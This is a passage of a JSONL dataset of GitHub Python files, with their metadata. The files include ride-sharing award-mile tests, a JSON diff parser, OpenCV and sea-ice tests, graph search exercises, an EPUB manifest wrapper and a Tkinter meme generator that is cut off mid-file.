self.granted_miles_that_will_expire_in_days(10, 365, self.YESTERDAY, client)\n youngest = self.granted_miles_that_will_expire_in_days(10, 60, self.TODAY, client)\n\n # 
when\n with freeze_time(self.TODAY):\n self.awards_service.remove_miles(client.id, 15)\n\n # then\n awarded_miles = self.awards_account_repository.find_all_miles_by(client)\n self.assert_that_miles_were_reduced_to(oldest, 0, awarded_miles)\n self.assert_that_miles_were_reduced_to(middle, 5, awarded_miles)\n self.assert_that_miles_were_reduced_to(youngest, 10, awarded_miles)\n\n async def test_should_remove_non_expiring_miles_last_when_many_transits(self):\n # given\n client = self.client_with_an_active_miles_program(Client.Type.NORMAL)\n # and\n self.fixtures.client_has_done_transits(client, 15, self.geocoding_service)\n\n regular_miles: AwardedMiles = self.granted_miles_that_will_expire_in_days(10, 365, self.TODAY, client)\n oldest_non_expiring_miles: AwardedMiles = self.granted_non_expiring_miles(5, self.DAY_BEFORE_YESTERDAY, client)\n\n # when\n with freeze_time(self.DAY_BEFORE_YESTERDAY):\n self.awards_service.remove_miles(client.id, 13)\n\n # then\n awarded_miles = self.awards_account_repository.find_all_miles_by(client)\n self.assert_that_miles_were_reduced_to(regular_miles, 0, awarded_miles)\n self.assert_that_miles_were_reduced_to(oldest_non_expiring_miles, 2, awarded_miles)\n\n async def test_should_remove_soon_to_expire_miles_first_when_client_is_vip(self):\n # given\n client = self.client_with_an_active_miles_program(Client.Type.VIP)\n # and\n\n second_to_expire: AwardedMiles = self.granted_miles_that_will_expire_in_days(\n 10, 60, self.YESTERDAY, client)\n third_to_expire: AwardedMiles = self.granted_miles_that_will_expire_in_days(\n 5, 365, self.DAY_BEFORE_YESTERDAY, client)\n first_to_expire: AwardedMiles = self.granted_miles_that_will_expire_in_days(\n 15, 30, self.TODAY, client)\n non_expiring: AwardedMiles = self.granted_non_expiring_miles(\n 1, self.DAY_BEFORE_YESTERDAY, client)\n\n # when\n with freeze_time(self.DAY_BEFORE_YESTERDAY):\n self.awards_service.remove_miles(client.id, 21)\n\n # then\n awarded_miles = self.awards_account_repository.find_all_miles_by(client)\n self.assert_that_miles_were_reduced_to(non_expiring, 1, awarded_miles)\n self.assert_that_miles_were_reduced_to(first_to_expire, 0, awarded_miles)\n self.assert_that_miles_were_reduced_to(second_to_expire, 4, awarded_miles)\n self.assert_that_miles_were_reduced_to(third_to_expire, 5, awarded_miles)\n\n async def test_should_remove_soon_to_expire_miles_first_when_removing_on_sunday_and_client_has_done_many_transits(\n self\n ):\n # given\n client = self.client_with_an_active_miles_program(Client.Type.NORMAL)\n # and\n self.fixtures.client_has_done_transits(client, 15, self.geocoding_service)\n # and\n second_to_expire: AwardedMiles = self.granted_miles_that_will_expire_in_days(\n 10, 60, self.YESTERDAY, client)\n third_to_expire: AwardedMiles = self.granted_miles_that_will_expire_in_days(\n 5, 365, self.DAY_BEFORE_YESTERDAY, client)\n first_to_expire: AwardedMiles = self.granted_miles_that_will_expire_in_days(\n 15, 10, self.TODAY, client)\n non_expiring: AwardedMiles = self.granted_non_expiring_miles(\n 100, self.YESTERDAY, client)\n\n # when\n with freeze_time(self.SUNDAY):\n self.awards_service.remove_miles(client.id, 21)\n\n # then\n awarded_miles = self.awards_account_repository.find_all_miles_by(client)\n self.assert_that_miles_were_reduced_to(non_expiring, 100, awarded_miles)\n self.assert_that_miles_were_reduced_to(first_to_expire, 0, awarded_miles)\n self.assert_that_miles_were_reduced_to(second_to_expire, 4, awarded_miles)\n self.assert_that_miles_were_reduced_to(third_to_expire, 5, 
awarded_miles)\n\n async def test_should_remove_expiring_miles_first_when_client_has_many_claims(self):\n # given\n client = self.client_with_an_active_miles_program(Client.Type.NORMAL)\n # and\n self.fixtures.client_has_done_claim_after_completed_transit(client, 3)\n # and\n second_to_expire: AwardedMiles = self.granted_miles_that_will_expire_in_days(\n 4, 60, self.YESTERDAY, client)\n third_to_expire: AwardedMiles = self.granted_miles_that_will_expire_in_days(\n 10, 365, self.DAY_BEFORE_YESTERDAY, client)\n first_to_expire: AwardedMiles = self.granted_miles_that_will_expire_in_days(\n 5, 10, self.YESTERDAY, client)\n non_expiring: AwardedMiles = self.granted_non_expiring_miles(\n 10, self.YESTERDAY, client)\n\n # when\n with freeze_time(self.YESTERDAY):\n self.awards_service.remove_miles(client.id, 21)\n\n # then\n awarded_miles = self.awards_account_repository.find_all_miles_by(client)\n self.assert_that_miles_were_reduced_to(non_expiring, 0, awarded_miles)\n self.assert_that_miles_were_reduced_to(third_to_expire, 0, awarded_miles)\n self.assert_that_miles_were_reduced_to(second_to_expire, 3, awarded_miles)\n self.assert_that_miles_were_reduced_to(first_to_expire, 5, awarded_miles)\n\n def granted_miles_that_will_expire_in_days(\n self,\n miles: int,\n expiration_in_days: int,\n when: datetime,\n client: Client,\n ) -> AwardedMiles:\n self.miles_will_expire_in_days(expiration_in_days)\n self.default_miles_bonus_is(miles)\n return self.miles_registered_at(when, client)\n\n def granted_non_expiring_miles(self, miles: int, when: datetime, client: Client) -> AwardedMiles:\n self.default_miles_bonus_is(miles)\n with freeze_time(when):\n return self.awards_service.register_non_expiring_miles(client.id, miles)\n\n def assert_that_miles_were_reduced_to(\n self,\n first_to_expire: AwardedMiles,\n miles_after_reduction: int,\n all_miles: List[AwardedMiles]\n ):\n actual = list(\n map(\n lambda awarded_miles: awarded_miles.get_miles_amount(datetime.min),\n filter(\n lambda am: first_to_expire.date == am.date\n and first_to_expire.get_expiration_date() == am.get_expiration_date(),\n all_miles\n )\n )\n )\n self.assertEqual(miles_after_reduction, actual[0])\n\n def miles_registered_at(self, when: datetime, client: Client) -> AwardedMiles:\n with freeze_time(when):\n return self.awards_service.register_miles(client.id, self.TRANSIT_ID)\n\n def client_with_an_active_miles_program(self, client_type: Client.Type) -> Client:\n with freeze_time(self.DAY_BEFORE_YESTERDAY):\n client = self.fixtures.a_client_with_type(client_type)\n self.fixtures.active_awards_account(client)\n return client\n\n def miles_will_expire_in_days(self, days: int):\n self.awards_service.app_properties.miles_expiration_in_days = days\n\n async def tearDown(self) -> None:\n drop_db_and_tables()\n\n def default_miles_bonus_is(self, miles: int):\n self.awards_service.app_properties.default_miles_bonus = miles\n","repo_name":"dragarthPl/cabs-python","sub_path":"src/main/tests/integration/test_removing_award_miles_integration.py","file_name":"test_removing_award_miles_integration.py","file_ext":"py","file_size_in_byte":11076,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"2"}
+{"seq_id":"17664420688","text":"def parser_dict(el1, el2):\n result = {}\n # Если сравниваемые значения - словари\n if type(el1) is dict and type(el2) is dict:\n\n keys_el1 = set(el1.keys())\n keys_el2 = set(el2.keys())\n\n children = sorted(keys_el1.union(keys_el2))\n\n for key in children:\n\n if key in keys_el1 and key in keys_el2:\n # Ключи в обоих словарях, ключи равны\n if el1.get(key) == el2.get(key):\n value = convert(el1[key])\n result[key] = {'status': ' ', 'children': value}\n else:\n recurs = parser_dict(convert(el1[key]), convert(el2[key]))\n result[key] = check_children(recurs)\n # Ключ только в первом словаре - удален\n elif key in keys_el1:\n result[key] = {'status': '- ', 'children': convert(el1[key])}\n # Ключ только во втором словаре - добавлен\n else:\n result[key] = {'status': '+ ', 'children': convert(el2[key])}\n # Если сравниваемые значения - разные типы\n else:\n return {'was': convert(el1), 'add': convert(el2)}\n\n return result\n\n\ndef check_children(some_dict):\n if some_dict.get('was') is not None:\n return {'status': 'diff', 'children': some_dict}\n return {'status': ' ', 'children': some_dict}\n\n\ndef convert(obj):\n dictionary = {\n 'False': 'false',\n 'True': 'true',\n 'None': 'null',\n }\n return dictionary.get(str(obj), obj)\n\n\nif __name__ == \"__main__\":\n pass\n # from pprint import pprint\n # from gen_diff.main import open_file\n # from gen_diff.formatter.plain_format import plain\n # from gen_diff.formatter.stylish_format import stylish\n # file1 = open_file(\n # \"/home/dimaevan/Projects/Python/python-project-lvl2/tests/fixtures/complicated/file3.json\")\n # file2 = open_file(\n # \"/home/dimaevan/Projects/Python/python-project-lvl2/tests/fixtures/complicated/file4.json\")\n # answer = parser_dict(file1, file2)\n # pprint(answer)\n # print(stylish(answer))\n","repo_name":"dimaevan/python-project-lvl2","sub_path":"gen_diff/parser/parsing.py","file_name":"parsing.py","file_ext":"py","file_size_in_byte":2250,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"37679147888","text":"import numpy as np\nimport cv2 as cv\nfrom analisys_craks import Pic, Settings\n\n# Canny settings\nlow_thr = 35\nhigh_thr = low_thr * 3\napr_size = 3\n\n# Morphology settings\nkernel_3 = np.ones((3, 3), np.uint8)\nkernel_5 = np.ones((5, 5), np.uint8)\n\nimg = cv.imread('sample_2.jpg')\ntest_img = Pic(img)\n\ncanny = cv.Canny(Pic.blur(test_img), low_thr, high_thr, apr_size)\n\n# 1st method: dilate + close + erode\nmorph_img_1 = cv.dilate(canny, kernel_3, iterations=1)\nmorph_img_1 = cv.morphologyEx(morph_img_1, cv.MORPH_CLOSE, kernel_3, iterations=2)\nmorph_img_1 = cv.erode(morph_img_1, kernel_3, iterations=1)\n\n# 2nd method: dilate + open + erode\n# morph_img_2 = cv.dilate(canny, kernel_3, iterations=2)\n# morph_img_2 = cv.morphologyEx(morph_img_2, cv.MORPH_OPEN, kernel_3, iterations=1)\n# morph_img_2 = cv.erode(morph_img_2, kernel_3, iterations=1)\n\nno_canny = cv.morphologyEx(Pic.adapt_thr(test_img), cv.MORPH_OPEN, kernel_3, iterations=1)\n\ncv.imshow('thr', test_img.img)\ncv.imshow('canny', canny)\ncv.imshow('canny+morph', morph_img_1)\ncv.waitKey(0)\ncv.destroyAllWindows()\n","repo_name":"aveegor/VKR_Project","sub_path":"Canny_test.py","file_name":"Canny_test.py","file_ext":"py","file_size_in_byte":1062,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"3002651011","text":"import pytest\nfrom seaice import *\nfrom firedrake import PeriodicSquareMesh, SpatialCoordinate, as_vector\n\n\n@pytest.mark.parametrize(\n \"family, theta\", [(a, b) for a in [\"CR\", \"CG\"] for b in [0, 0.5, 1]]\n)\ndef test_vp_transport_model_compile(family, theta):\n timestep = 1\n dumpfreq = 10 ** 3\n timescale = 1\n\n dirname = \"./output/test-output/u.pvd\"\n\n number_of_triangles = 35\n length = 5 * 10 ** 5\n mesh = PeriodicSquareMesh(number_of_triangles, number_of_triangles, length)\n\n x, y = SpatialCoordinate(mesh)\n\n ocean_curr = as_vector(\n [0.1 * (2 * y - length) / length, -0.1 * (length - 2 * x) / length]\n )\n\n ic = {\"u\": 0, \"a\": x / length, \"h\": 1, \"s\": as_vector([[0, 0], [0, 0]])}\n advect = {\"h\": True, \"a\": True}\n stabilised = {\"state\": False, \"alpha\": 1}\n conditions = Conditions(\n family=family,\n ocean_curr=ocean_curr,\n ic=ic,\n advect=advect,\n stabilised=stabilised,\n theta=theta,\n )\n\n timestepping = TimesteppingParameters(timescale=timescale, timestep=timestep)\n output = OutputParameters(dirname=dirname, dumpfreq=dumpfreq)\n solver = SolverParameters()\n params = SeaIceParameters()\n\n vp_transport = ViscousPlasticTransport(\n mesh=mesh,\n conditions=conditions,\n timestepping=timestepping,\n output=output,\n params=params,\n solver_params=solver,\n )\n\n t = 0\n\n while t < timescale - 0.5 * timestep:\n vp_transport.solve(vp_transport.usolver)\n vp_transport.update(vp_transport.w0, vp_transport.w1)\n t += timestep\n\n assert t > 0\n","repo_name":"elma16/floe","sub_path":"tests/test_vp_transport_model_compile.py","file_name":"test_vp_transport_model_compile.py","file_ext":"py","file_size_in_byte":1614,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"}
+{"seq_id":"4595709355","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\nimport os\n\n\ndef batch_sequence(x, sequence_length=10, num_shift=1):\n num_points = x.shape[0]\n inputs = []\n targets = []\n # for p in np.arange(0, num_points, max(num_shift, sequence_length // 5)):\n for p in np.arange(0, num_points, num_shift):\n # prepare inputs (we're sweeping from left to right in steps sequence_length long)\n if p + sequence_length + num_shift >= num_points:\n break\n\n inputs.append(x[p: p + sequence_length, :])\n targets.append(x[p + sequence_length, :])\n inputs = np.array(inputs)\n targets = np.array(targets)\n idx = np.random.permutation(np.arange(inputs.shape[0]))\n inputs = inputs[idx]\n targets = targets[idx]\n\n return inputs, targets\n\n\ndef plot_final_average_results(linear, nonlinear, nonlinear_lag, save_dir, index):\n ground_truth = np.zeros((5, 5))\n ground_truth[0, 1] = 1\n ground_truth[0, 2] = 1\n ground_truth[0, 3] = 1\n ground_truth[3, 4] = 1\n ground_truth[4, 3] = 1\n\n plt.figure(figsize=(8, 3))\n ax1 = plt.subplot(142)\n ax1.matshow(linear)\n ax1.axis('off')\n ax1.set_title('Linear')\n\n ax2 = plt.subplot(143)\n ax2.matshow(nonlinear)\n ax2.axis('off')\n ax2.set_title('Nonlinear')\n\n ax3 = plt.subplot(144)\n ax3.matshow(nonlinear_lag)\n ax3.axis('off')\n ax3.set_title('Nonlinear lag')\n\n ax4 = plt.subplot(141)\n ax4.matshow(ground_truth)\n ax4.axis('off')\n ax4.set_title('Ground Truth')\n\n plt.savefig(os.path.join(save_dir, str(index).rjust(2, '0') + 'all.png'))\n\n\ndef plot_save_intermediate_results(matrix, mode, index, save_dir):\n fig = plt.figure()\n ax = fig.add_subplot(1, 1, 1)\n ax.matshow(matrix)\n plt.savefig(os.path.join(save_dir, mode + str(index).rjust(2, '0') + '.png'))\n np.savetxt(os.path.join(save_dir, mode + str(index).rjust(2, '0') + '.txt'), matrix)\n","repo_name":"shaozhefeng/RNN-GC","sub_path":"util/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":1900,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"2"}
+{"seq_id":"40033801551","text":"from input import data\nimport itertools as it\n\n\ndef sol(data, noun=12, verb=2):\n arr = [int(n) for n in data.split(',')]\n arr[1] = noun\n arr[2] = verb\n i = 0\n while True:\n n, a, b, c = arr[i:i+4]\n if n == 99:\n break\n elif n == 1:\n arr[c] = arr[a] + arr[b]\n elif n == 2:\n arr[c] = arr[a] * arr[b]\n else:\n print('weird', n)\n i += 4\n return arr[0]\n\n# part1\nprint(sol(data))\n\n# part2\nfor n, v in it.product(range(100), range(100)):\n if sol(data, n, v) == 19690720:\n print(100*n+v)\n","repo_name":"Skaft/aoc","sub_path":"2019/day2/aoc2.py","file_name":"aoc2.py","file_ext":"py","file_size_in_byte":591,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"}
+{"seq_id":"33570024843","text":"\ndef dfs(grid,i,j):\n if (i<0 or j <0 or i>=len(grid) or j>=len(grid[0]) or grid[i][j]=='0' ):\n return 0\n grid[i][j]='0'\n dfs(grid,i+1,j)\n dfs(grid,i-1,j)\n dfs(grid,i,j+1)\n dfs(grid,i,j-1)\n return 1\n\ndef numIslands(grid):\n if (grid == None or len(grid) == 0):\n return 0\n numIslands = 0\n for i in range(len(grid)):\n for j in range (len(grid[i])):\n if grid[i][j]=='1':\n numIslands += dfs(grid,i,j)\n return numIslands\n \ngrid = [[\"1\",\"1\",\"1\",\"1\",\"0\"],[\"1\",\"1\",\"0\",\"1\",\"0\"],[\"1\",\"1\",\"0\",\"0\",\"0\"],[\"0\",\"0\",\"0\",\"0\",\"0\"]]\nprint (numIslands(grid)) \n\n\ngrid = [[\"1\",\"1\",\"0\",\"1\"],[\"0\",\"0\",\"1\",\"0\"],[\"0\",\"0\",\"0\",\"0\"]]\nprint (numIslands(grid))","repo_name":"abhilashgcp/python-programs","sub_path":"NumberIslands/NumberIsland.py","file_name":"NumberIsland.py","file_ext":"py","file_size_in_byte":728,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"}
+{"seq_id":"4428076623","text":"from queue import PriorityQueue\nimport json\n\nwith open('Assignment1.3Graph.json') as f:\n data = json.load(f)\n\n# a\n# /|\\\n# b e c\n# /| / |\n# d f g\n\n#Start and Goal of our Searches \nstart = 'a'\ngoal = 'g'\n\n#Creating our Adjacent List for each Node.\n# def setup_graph(data):\n# graph = {}\n# for node in data['nodes']:\n# grouping = {\"neighbor\":\"allowance\"}\n# for edge in data['edges']:\n# if edge['source'] == node:\n# grouping[\"neighbor\"] = edge['target']\n# grouping[\"allowance\"]= edge['cost']\n# grouping.update()\n\n# if edge['target'] == node:\n# grouping[\"neighbor\"] = edge['target']\n# grouping[\"allowance\"]= edge['cost']\n# grouping.update()\n# graph.update({node:grouping})\n# print(graph)\n# return graph\n\ndef setup_graph(data):\n graph = {}\n for node in data['nodes']:\n grouping={} \n for edge in data['edges']:\n if edge['source'] == node:\n grouping.update({edge['target']:edge['cost' ]} )\n graph.update({node:grouping})\n return graph\nsetup_graph(data) \nadjList = setup_graph(data)\n\n#Using Priority Queue to try and implement uniform cost search\ndef UCS(adjList,start,goal):\n #Creating arrays, queues, sets\n queue = PriorityQueue()\n visited = {}\n level = {}\n parent = {}\n bfs_traversal = []\n path = []\n \n #Initializing our arrays\n for node in adjList.keys():\n visited[node] = False\n parent[node] = None\n level[node] = -1 \n \n visited[start] = True #Initialize our start node as visited\n level[start] = 0 #Initializes our source node level as 0\n queue.put(start) #putting our start node into the queue\n \n #LIFO of queue into our bfs_traversal\n while not queue.empty():\n x = queue.get() #Remove item from queue\n bfs_traversal.append(x) #Adds item last item we got from queue into traversal\n print(bfs_traversal)\n \n for AI in adjList[x]:\n if not visited[AI]:\n visited[AI] = True #Add to Visited\n parent[AI] = x\n level[AI] = level[x] + 1 #Increases level\n queue.put(AI) #Put item on queue\n \n #Create our Shortest Path from Start to Goal\n while goal is not None:\n path.append(goal)\n goal = parent[goal]\n path.reverse() #Reverse our path\n print(path) #Bingo\n \nUCS(adjList,start,goal)\n","repo_name":"Joshua-Newman/Artificial-Intelligence","sub_path":"Uniform-Cost Search/UCS.py","file_name":"UCS.py","file_ext":"py","file_size_in_byte":2535,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"31392951449","text":"#!/usr/bin/env python3\n# coding: utf-8\n\n__author__ = \"ChenyangGao \"\n__version__ = (0, 1, 1)\n__all__ = [\"OpfWrapper\", \"ManifestItem\", \"SpineItemref\"]\n\nfrom os import PathLike\nfrom typing import AnyStr, Iterator, NamedTuple, Optional, Union\nfrom urllib.parse import quote, unquote\n\nfrom lxml.etree import Element, _Element\n\nfrom util.mapper import Mapper\nfrom util.mimetype import guess_mimetype\nfrom util.makeid import makeid\nfrom util.opfparser import OpfParser\n\n\nSPINE_CONCERNED_MIMES = [\"text/html\", \"application/xhtml+xml\"]\n\n\nclass ManifestItem(NamedTuple):\n id: str\n href: str\n bookpath: str\n media_type: str = \"application/octet-stream\"\n properties: Optional[str] = None\n fallback: Optional[str] = None\n media_overlay: Optional[str] = None\n\n\nclass SpineItemref(NamedTuple):\n idref: str\n id: Optional[str] = None\n linear: Optional[str] = None\n properties: Optional[str] = None\n\n\nclass OpfWrapper(OpfParser):\n\n def __init__(self, ebook_root: AnyStr | PathLike[AnyStr] = \"\"):\n super().__init__(ebook_root)\n\n # Invert key dictionaries to allow for reverse access\n self.id_to_bookpath = Mapper((id, self.id_to_bookpath(id)) for id in self.manifest_map)\n self.href_to_id = Mapper((self.id_to_href(id), id) for id in self.manifest_map)\n self.bookpath_to_id = Mapper((self.id_to_bookpath(id), id) for id in self.manifest_map)\n\n def has(\n self, \n id: Optional[str] = None, \n href: Optional[str] = None, \n bookpath: Optional[str] = None, \n ) -> bool:\n if id is not None:\n return id in self.manifest_map\n elif href is not None:\n return href in self.href_to_id\n elif bookpath is not None:\n return href in self.bookpath_to_id\n return False\n\n def get(\n self, \n id: Optional[str] = None, \n href: Optional[str] = None, \n bookpath: Optional[str] = None, \n ) -> ManifestItem:\n if id is not None:\n pass\n elif href is not None:\n try:\n id = self.href_to_id(href)\n except KeyError as e:\n raise ValueError(\n f\"href {href!r} does not exist in manifest!\") from e\n elif bookpath is not None:\n try:\n id = self.bookpath_to_id(bookpath)\n except KeyError as e:\n raise KeyError(\n f\"Bookpath {bookpath!r} does not exist in manifest!\") from e\n else:\n raise ValueError(\"Give (not None) at least one of arguments: \"\n \"id, href or bookpath\")\n\n item = self.manifest_map[id]\n return ManifestItem(\n id = id, \n href = self.id_to_href(id), \n bookpath = self.id_to_bookpath(id), \n media_type = item.get(\"media-type\", \"application/octet-stream\"), \n properties = item.get(\"properties\"), \n fallback = item.get(\"fallback\"), \n media_overlay = item.get(\"media-overlay\"), \n )\n\n def add(\n self, \n path: Union[None, AnyStr, PathLike[AnyStr]] = None, \n bookpath: Optional[str] = None, \n href: Optional[str] = None, \n id: Optional[str] = None, \n media_type: Optional[str] = None, \n properties: Optional[dict] = None, \n fallback: Optional[str] = None, \n media_overlay: Optional[str] = None, \n ) -> ManifestItem:\n if path is not None:\n bookpath = self.path_to_bookpath(path)\n href = self.bookpath_to_href(bookpath)\n elif bookpath is not None:\n href = self.bookpath_to_href(bookpath)\n elif href is not None:\n bookpath = self.href_to_bookpath(href)\n else:\n raise ValueError(\"Give (not None) at least one of arguments: \"\n \"path, bookpath or href\")\n\n if id is None:\n id = makeid(href, bookpath, self.manifest_map.keys())\n elif id in self.manifest_map:\n raise ValueError(f\"Id {id} is already exist in 
manifest\")\n\n if media_type is None:\n media_type = guess_mimetype(href)\n if media_type is None:\n raise ValueError(\"Unable to determine media-type (media_type)\")\n\n attrib = {\"id\": id, \"href\": quote(href, \":/#\"), \"media-type\": media_type}\n if properties is not None:\n attrib[\"properties\"] = properties\n if fallback is not None:\n attrib[\"fallback\"] = fallback\n if media_overlay is not None:\n attrib[\"media-overlay\"] = media_overlay\n el = Element(\"item\", attrib)\n self.manifest.append(el)\n self.manifest_map[id] = el\n item = ManifestItem(\n id = id, \n href = href, \n bookpath = bookpath, \n media_type = media_type, \n properties = properties, \n fallback = fallback, \n media_overlay = media_overlay, \n )\n self.id_to_bookpath[id] = bookpath\n self.href_to_id[href] = id\n self.bookpath_to_id[bookpath] = id\n\n if media_type in SPINE_CONCERNED_MIMES:\n el = Element(\"itemref\", {\"idref\": id})\n self.spine.append(el)\n self.spine_map[id] = el\n\n return item\n\n def delete(\n self, \n id: Optional[str] = None, \n href: Optional[str] = None, \n bookpath: Optional[str] = None, \n ) -> ManifestItem:\n item = self.get(id, href, bookpath)\n\n el = self.manifest_map.pop(item.id)\n self.manifest.remove(el)\n\n del self.id_to_bookpath[item.id]\n del self.href_to_id[item.href]\n del self.bookpath_to_id[item.bookpath]\n\n if item.id in self.spine_map:\n el = self.spine_map.pop(item.id)\n self.spine.remove(el)\n\n return item\n\n def gettocid(self):\n # To find the manifest id of toc.ncx\n return next((\n id for id, item in self.manifest_map.items()\n if item.get(\"media-type\") == \"application/x-dtbncx+xml\"\n ), None)\n\n def getpagemapid(self):\n # To find the manifest id of page-map.xml\n return next((\n id for id, item in self.manifest_map.items()\n if item.get(\"media-type\") == \"application/oebs-page-map+xml\"\n ), None)\n\n def getnavid(self):\n # To find the manifest id of nav.xhtml\n if self.epub < \"3.0\":\n return None\n return next((\n id for id, item in self.manifest_map.items()\n if item.get(\"media-type\") == \"application/xhtml+xml\"\n and \"nav\" in item.get(\"properties\", \"\")\n ), None)\n\n def manifest_iter(self) -> Iterator[ManifestItem]:\n yield from map(self.get, self.manifest_map)\n\n def text_iter(self) -> Iterator[ManifestItem]:\n spine_map = self.spine_map\n for id, item in self.manifest_map.items():\n if id in spine_map and spine_map[id].get(\"linear\") != \"no\" or \\\n item.get(\"media-type\") in (\"text/html\", \"application/xhtml+xml\"):\n yield self.get(id)\n\n def spine_iter(self) -> Iterator[SpineItemref]:\n for idref, itemref in self.spine_map.items():\n yield SpineItemref(\n idref=idref, \n id=itemref.get(\"id\"), \n linear=itemref.get(\"linear\"), \n properties=itemref.get(\"properties\"), \n )\n\n","repo_name":"ChenyangGao/epub-toolset","sub_path":"cmdlineTools/watch_epub/watch_epub/util/opfwrapper.py","file_name":"opfwrapper.py","file_ext":"py","file_size_in_byte":7552,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"2"}
+{"seq_id":"7352531558","text":"import _thread\nfrom concurrent.futures import thread\nimport threading\nfrom tkinter import *\nfrom tkinter import filedialog\nimport tkinter\nfrom tkinter import ttk\nfrom tkinter.tix import IMAGETEXT\nfrom turtle import left, right\nimport cv2 as theEngine\nimport random\nimport numpy as np\nfrom urllib.request import urlopen\nimport urllib.request\nimport requests\nfrom matplotlib import pyplot as plt\nimport scipy.spatial as spatial\nfrom PySide6.QtWidgets import QApplication, QWidget, QPushButton, QLabel as qt\nimport sys\nfrom tkinter import *\nfrom PIL import Image, ImageTk, ImageSequence\nimport urllib3\nfrom itertools import count, cycle\n\n#Setup for the main variables that host all the individual parts such as inputs and buttons\nthumbnail_resolution = (640,360)\ntext = ''\napp = Tk()\napp.title(\"Generate Memez\")\ntimes = 0\ntabOwner = ttk.Notebook(master = app)\ntab1 = Frame(tabOwner)\ntab2 = Frame(tabOwner)\ntabOwner.add(tab1, text = \"Generator\")\ntabOwner.add(tab2, text=\"User Input\")\ntabOwner.grid(row=0,column=0,sticky=\"ew\")\nlabel = Label(tab1, image= '')\n\n#Next is for the main Dwayne Johnson Photo to keep the GUI look decent\nimageFinish = ImageTk.PhotoImage(Image.open(\"6j39t1.jpg\"))\n\nlabel.config(image=imageFinish)\nlabel.grid(row=0, column=2, pady=2)\n\nentryLabel = Label(tab1, text= 'How Many Clickbait Arrows? (Default=1): ')\nentryLabel.grid(row=1,column=2, pady=2)\n\nnumOfArrows = Entry(tab1, width= 20)\nnumOfArrows.grid(row=2,column=2,pady=2)\n\n#This next part is the same layout, but for the user input section\nlabel2 = Label(tab2,image = '')\nlabel2.config(image=imageFinish)\nlabel2.grid(row=0, column=2)\n\nentryLabel2 = Label(tab2, text= 'How Many Clickbait Arrows? (Default=1): ')\nentryLabel2.grid(row=1,column=2, pady=2)\n\nnumOfArrows2 = Entry(tab2, width= 20)\nnumOfArrows2.grid(row=2,column=2,pady=2)\n\nwhatText = Label(tab2,text = \"What Text Shall Da Meme Display My Lord?\\nType \\\"GENERATE\\\" if you wish to generate text\")\nwhatText.grid(row=3,column=2,pady=2)\n\ntextEntry = Entry(tab2,width=20)\ntextEntry.grid(row=4,column=2,pady=2)\n\nwhatImage = Label(tab2,text=\"Please Upload the meme image\")\nwhatImage.grid(row=5,column=2,pady=2)\n\nclass userInput:\n \n def runGIF(fileName,fileName2):\n lbl = ImageLabel(tab2)\n lbl2 = ImageLabel(tab2)\n lbl2.load(fileName2,False) \n lbl2.grid(row=0, column=3, pady=2)\n lbl.load(fileName,False)\n lbl.grid(row=0,column=1,pady=1)\n userInput.hitTheGriddy()\n return\n \n #Method made to orgnaize all the parts to be centered through the grid method\n def hitTheGriddy(self):\n label2.grid(row=0, column=2,pady=2)\n entryLabel2.grid(row=1,column=2, pady=4)\n whatText.grid(row=3,column=2,pady=2)\n textEntry.grid(row=4,column=2,pady=2)\n whatImage.grid(row=5,column=2,pady=2)\n \n \n \n def userUploadImage(self):\n global times\n \n #Sets up and asks user to upload their image\n filetypes =(('JPEG File', '*.jpg'),('PNG File', '*.png'))\n userImage = theEngine.imread(filedialog.askopenfile(filetypes=filetypes).name)\n arrows = 1\n \n try:\n arrows = int(numOfArrows2.get())\n except:\n print('')\n pass\n text = textEntry.get()\n if(text==\"GENERATE\"):\n text = makingImage.get_text()\n else:\n text = textEntry.get()\n saveBtn = Button (tab2, text = \"Save the Image Bro\", command = makingImage.saveFile, width = 20)\n saveBtn.grid(row=7,column=2,pady=2)\n #times is to reset the image display and ensure that the current image is what is saved via the button\n if times >0:\n 
label.config(image='') \n saveBtn.destroy() \n label.grid(row=0, column=1, pady=2)\n \n #Firstly, the image is cropped in accord with the predetermined resolution earlier\n cropped_img = makingImage.crop_image(userImage)\n \n\n #Find the densest region of keypoints in the ORB Algorithm\n #Then we create a circle around that area and save it to an image\n densest = makingImage.get_densest(makingImage.get_kp(cropped_img)) \n print('Densest Point is at: ' + str(densest))\n \n #This draws an arrow that points to the circle, further employing the randomness that is expected\n circled_img = makingImage.draw_shapes(cropped_img, densest,arrows)\n \n x_length = circled_img.shape[1]\n #Setup for the font and then put the text on an image with the circle\n txt_scale, txt_height = makingImage.get_font_scale(makingImage.get_text(), x_length)\n if densest[1][0] > circled_img.shape[0] / 2:\n pos = (0, txt_height + int(.07 * circled_img.shape[0]))\n else:\n pos = (0, + circled_img.shape[0] - int(.07 * circled_img.shape[0])) \n line_width = txt_scale * 3\n txted_img = theEngine.putText(circled_img, text, pos, theEngine.FONT_HERSHEY_DUPLEX, txt_scale, (0, 0 ,0), int(line_width * 4), theEngine.LINE_AA)\n txted_img = theEngine.putText(circled_img, text, pos, theEngine.FONT_HERSHEY_DUPLEX, txt_scale, (255, 255, 255), int(line_width), theEngine.LINE_AA)\n \n \n blue,green,red = theEngine.split(txted_img)\n firstStep = theEngine.merge((red,green,blue))\n secondStep= Image.fromarray(firstStep)\n global saveImage \n saveImage= secondStep\n imageFin = ImageTk.PhotoImage(image = secondStep)\n label2.config(image=imageFin)\n print(\"Configged Image\")\n label2.grid(row=0, column=3, pady=2)\n times+=1\n userInput.runGIF(\"frog_left.gif\",\"frog_right.gif\")\n tab2.config(bg='blue')\n app.mainloop()\n \n def gifTab2(self):\n userInput.userUploadImage()\n makingImage.runGIF(\"frog_left.gif\",\"frog_right.gif\")\n \n \n \nclass ImageLabel(tkinter.Label):\n \n \"\"\"\n A Label that displays images, and plays them if they are gifs\n :im: A PIL Image instance or a string filename\n 